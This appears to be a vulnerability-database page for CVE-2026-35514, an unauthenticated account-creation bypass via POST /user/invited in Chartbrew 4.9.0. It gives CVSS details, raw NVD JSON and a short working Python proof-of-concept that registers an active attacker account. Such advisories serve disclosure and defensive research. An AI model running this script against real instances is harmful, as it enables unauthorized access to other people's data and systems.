Security Vulnerability Report
δΈ­ζ–‡
CVE-2026-35514 CVSS 6.5 MEDIUM

CVE-2026-35514

Published: 2026-04-30 19:16:09
Last Modified: 2026-05-01 15:31:02
Source: [email protected]

Description

Chartbrew is an open-source web application that can connect directly to databases and APIs and use the data to create charts. In version 4.9.0, the endpoint POST /user/invited does not validate any invite token, authentication header, or session. Any unauthenticated attacker can call this endpoint directly to create a fully active account and receive a valid JWT β€” even when the instance has existing users and signupRestricted is enabled. This bypass is distinct from the normal registration endpoint (POST /user) which enforces signupRestricted and sets active: false pending verification. This issue has been patched in version 5.0.0.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Chartbrew < 5.0.0
Chartbrew 4.9.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests def exploit_chartbrew(url): """ PoC for CVE-2026-35514: Chartbrew Authentication Bypass via /user/invited """ target_endpoint = f"{url.rstrip('/')}/user/invited" # Malicious payload to create a new active user payload = { "email": "[email protected]", "password": "Admin123!", "name": "Malicious User" } headers = { "Content-Type": "application/json" } try: print(f"[*] Sending request to {target_endpoint}...") response = requests.post(target_endpoint, json=payload, headers=headers, timeout=10) if response.status_code == 200 or response.status_code == 201: print("[+] Exploit successful! Account created.") print("[+] Response data:") print(response.text) else: print(f"[-] Request failed with status code: {response.status_code}") print(f"[-] Response: {response.text}") except Exception as e: print(f"[!] An error occurred: {e}") if __name__ == "__main__": target = "http://localhost:3000" # Replace with actual target exploit_chartbrew(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-35514", "sourceIdentifier": "[email protected]", "published": "2026-04-30T19:16:09.217", "lastModified": "2026-05-01T15:31:02.467", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Chartbrew is an open-source web application that can connect directly to databases and APIs and use the data to create charts. In version 4.9.0, the endpoint POST /user/invited does not validate any invite token, authentication header, or session. Any unauthenticated attacker can call this endpoint directly to create a fully active account and receive a valid JWT β€” even when the instance has existing users and signupRestricted is enabled. This bypass is distinct from the normal registration endpoint (POST /user) which enforces signupRestricted and sets active: false pending verification. This issue has been patched in version 5.0.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-306"}]}], "references": [{"url": "https://github.com/chartbrew/chartbrew/releases/tag/v5.0.0", "source": "[email protected]"}, {"url": "https://github.com/chartbrew/chartbrew/security/advisories/GHSA-g47g-v5cp-j8hp", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.